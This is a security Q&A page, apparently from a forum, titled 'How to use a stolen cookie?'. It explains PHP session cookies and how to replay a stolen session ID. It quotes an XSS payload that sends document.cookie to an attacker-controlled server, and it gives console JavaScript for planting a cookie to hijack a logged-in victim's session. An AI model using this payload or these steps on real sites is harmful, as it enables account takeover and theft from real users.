How to use a stolen cookie?

...php writes the cookie into a file. (I think that is one of the normal processes).

From what you wrote above, it seems that there could be some misconception with your understanding on how a session is being created and maintained on a website. When a user logs in to a website, a session id is generated and this id is stored in a special cookie, known as the session cookie, on the client's browser, like this:

PHPSESSID:fgws4j52jcm10dkgw02nd2

At the same time, a session file (or database row) with the same id is created containing variables (such as user name, login time) related to that particular user. These session variables are stored server side and called from the superglobal $_SESSION array when a session is started.

To hijack a session, what you need is a cookie containing the name-value pair like the one above. One precondition is that the victim must be logged in during the attack such that the session file with the stolen id is still fresh on the server. Also, the website must not be doing other extraneous checks (such as user agent or IP address) to thwart hijackers.

<script>location.href = 'http://myserverIP/test/signup.php?cookie='+document.cookie;</script>

The javascript you wrote above merely injects a name-value pair in the superglobal $_GET array. What you want is to transmit the name-value pair using your browser cookie, certainly not with the URL.

Most modern browsers store the cookie information in a database such as sqlite. To edit a cookie, you need to access the web console or the developer toolbar which is covered here for Chrome and here for Firefox.


AFAIK, using stolen cookies depends on the browser you are using.
For instance firefox stores cookies in a not-plain-text file cookies.sqlite in which you can't just copy/past the cookie's key/value.
Firebug gives you the ability to add/edit cookies for the targeted website.


You can use JavaScript to set the cookie in your browser:

document.cookie =
 'cookie1=test; expires=Fri, 3 Aug 2022 20:47:11 UTC; path=/'

Just need to open a console by pressing F12 or place the JavaScript in a webpage.

See https://stackoverflow.com/questions/14573223/set-cookie-and-get-cookie-with-javascript

Tags:

Cookies

Session Management

Related

What is the difference between a "Thumbprint Algorithm" "Signature Algorithm" and "Signature Hash Algorithm" for a certificate? One liner to create passwords in linux? Hardware token to authenticate web application Is the option to jump to blanks in password fields a security risk? Is it possible to clone an RFID/NFC card using a simple RFID reader, for future reuse and impersonation? Passing secret keys securely to docker containers How does someone with HubSpot Sidekick knows when I opened their sent email? How do I use "openssl s_client" to test for (absence of) SSLv3 support? How to identify the HTTP methods supported by a web server? What to do about "approved" direct banking MITM sites like sofort.com? Putting my PGP ID/link on printed business cards When does iOS check validity of enterprise certificates?

Recent Posts